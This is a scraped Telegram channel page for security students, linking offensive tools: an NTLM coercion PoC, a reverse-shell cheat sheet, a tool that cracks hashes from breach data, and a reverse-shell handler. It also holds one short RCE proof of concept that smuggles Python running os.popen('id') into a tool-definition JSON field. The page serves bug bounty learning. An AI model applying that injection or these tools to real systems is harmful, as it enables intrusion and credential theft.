SecList for CyberStudents – Telegram

SecList for CyberStudents

@SecListForCyberStudents

238 subscribers

580 photos

23 videos

211 files

892 links

Think outside the box

Download Telegram

About

Blog

Apps

Platform

SecList for CyberStudents

238 subscribers

SecList for CyberStudents

https://github.com/NotSoSecure/docker_fetch/

GitHub - NotSoSecure/docker_fetch: Data extraction tool for Docker Registry API

Data extraction tool for Docker Registry API. Contribute to NotSoSecure/docker_fetch development by creating an account on GitHub.

105 views11:52

SecList for CyberStudents

Forwarded from Brut Security

👨‍🍳 Damn-Vulnerable-RESTaurant 👨‍🍳

⚡️An intentionally vulnerable Web API game for learning and training purposes dedicated to developers, ethical hackers and security engineers.

✅Get: https://github.com/theowni/Damn-Vulnerable-RESTaurant-API-Game

108 views17:23

SecList for CyberStudents

https://github.com/topotam/PetitPotam

https://github.com/ly4k/PetitPotam

GitHub - topotam/PetitPotam: PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw…

PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions. - topotam/PetitPotam

124 viewsedited 06:25

SecList for CyberStudents

https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#summary

swisskyrepo.github.io

Reverse Shell Cheat Sheet - Internal All The Things

Active Directory and Internal Pentest Cheatsheets

121 views06:43

SecList for CyberStudents

https://github.com/sm00v/Dehashed/

GitHub - sm00v/Dehashed: This repo contains scripts to query dehashed.com and crack the returned hashes which will then save all…

This repo contains scripts to query dehashed.com and crack the returned hashes which will then save all cleartext passwords and hashes to files. - sm00v/Dehashed

132 views06:54

SecList for CyberStudents

https://github.com/tillson/git-hound

GitHub - tillson/git-hound: Fast GitHub recon tool. Scans for leaked secrets across all of GitHub, not just known repos and orgs.…

Fast GitHub recon tool. Scans for leaked secrets across all of GitHub, not just known repos and orgs. Support for GitHub dorks. - tillson/git-hound

125 views06:17

SecList for CyberStudents

https://www.youtube.com/live/YtfbuDWKEx0?si=fwVfshLAMGsG_SOE

How I Pentested MyFitnessPal Live: Full Bug Bounty Walk-through (Zero to Advanced)

🔍 In this live demo, I take you step-by-step through how I performed a full bug bounty hunt on MyFitnessPal — from scratch to reporting. If you’re a cybersecurity student, bug hunter, or pentester targeting USA assets, this is your real-world walkthrough.…

124 views04:47

SecList for CyberStudents

SecList for CyberStudents

https://www.youtube.com/live/YtfbuDWKEx0?si=fwVfshLAMGsG_SOE

Live🔥

121 views04:48

SecList for CyberStudents

https://github.com/dnSpy/dnSpy

GitHub - dnSpy/dnSpy: .NET debugger and assembly editor

.NET debugger and assembly editor. Contribute to dnSpy/dnSpy development by creating an account on GitHub.

108 views08:43

SecList for CyberStudents

https://securityonline.info/critical-mikrotik-flaw-cve-2025-61481-cvss-10-0-exposes-router-admin-credentials-over-unencrypted-http-webfig/

Daily CyberSecurity

Critical MikroTik Flaw (CVE-2025-61481, CVSS 10.0) Exposes Router Admin Credentials Over Unencrypted HTTP WebFig

A Critical (CVSS 10.0) flaw (CVE-2025-61481) in MikroTik RouterOS/SwOS exposes the WebFig management interface over unencrypted HTTP by default, allowing remote credential theft via MitM.

111 views08:03

SecList for CyberStudents

I'm going to write about a piece of malware that appears under the name "kaudit0." I did some research, and all the information I found indicates that its purpose is crypto-mining. There isn't much information available about it, but what does exist appears to be credible.

#malware

117 views08:15

SecList for CyberStudents

https://medium.com/@Aacle/ssrf-part-3-advanced-tricks-timing-channels-out-of-the-box-detection-693c07c97015

SSRF — Part 3: Advanced Tricks, Timing Channels & Out-of-the-Box Detection 🚀

Subtitle: The secret-sauce volume for bug bounty hunters — defensive-first, high-signal techniques that convert sketchy SSRF signs into…

105 views05:09

SecList for CyberStudents

https://infosecwriteups.com/how-we-discovered-a-stored-html-injection-in-a-chatbot-system-%EF%B8%8F-6cbefe8b0718

How We Discovered a Stored HTML Injection in a Chatbot System 🕷️

What happens when you feed HTML to a hungry chatbot? Spoiler: It gets digested without question!

114 views08:26

SecList for CyberStudents

https://github.com/rahmansec/SecretHunter

GitHub - rahmansec/SecretHunter: A powerful and lightweight tool for bug bounty hunters and security researchers to identify hardcoded…

A powerful and lightweight tool for bug bounty hunters and security researchers to identify hardcoded secrets, API keys, tokens, credentials, and other sensitive data in code repositories, web appl...

105 views14:14

SecList for CyberStudents

https://github.com/coffinxp/lostfuzzer

GitHub - coffinxp/lostfuzzer: A Bash script for automated nuclei dast scanning by using passive urls

A Bash script for automated nuclei dast scanning by using passive urls - coffinxp/lostfuzzer

84 views11:40

SecList for CyberStudents

https://www.youtube.com/watch?v=x2Nm7jCmoVA

How I legally hacked British Airways (Live Bug Bounty Hunting And Recon)

This video was originally taken down, after extensive research of youtube's terms I have re-uploaded a highly modified version to be compliant with all terms, to YouTube staff and automated moderators, please take note of all disclaimers etc and CONTACT ME…

86 views12:00

SecList for CyberStudents

https://github.com/malwarekid/OnlyShell

GitHub - malwarekid/OnlyShell: A powerful Go-based multi-shell handler for managing multiple reverse shell connections simultaneously…

A powerful Go-based multi-shell handler for managing multiple reverse shell connections simultaneously with features like shell type detection, background management, command broadcasting, and real...

133 views15:01

SecList for CyberStudents

POC:
{
  "name": "darkshadow",
  "args": {},
  "json_schema": {"type": "object", "properties": {}},
"source_code": "def darkshadow():\n    import os\n    data='0'.encode('utf-8')\n    return ''+os.popen('id').read()"
}

#BugBounty #RCE

🔥1

90 views21:05

SecList for CyberStudents

https://github.com/Invicti-Security/brainstorm?s=09

GitHub - Invicti-Security/brainstorm: A smarter web fuzzing tool that combines local LLM models and ffuf to optimize directory…

A smarter web fuzzing tool that combines local LLM models and ffuf to optimize directory and file discovery - Invicti-Security/brainstorm

96 views21:20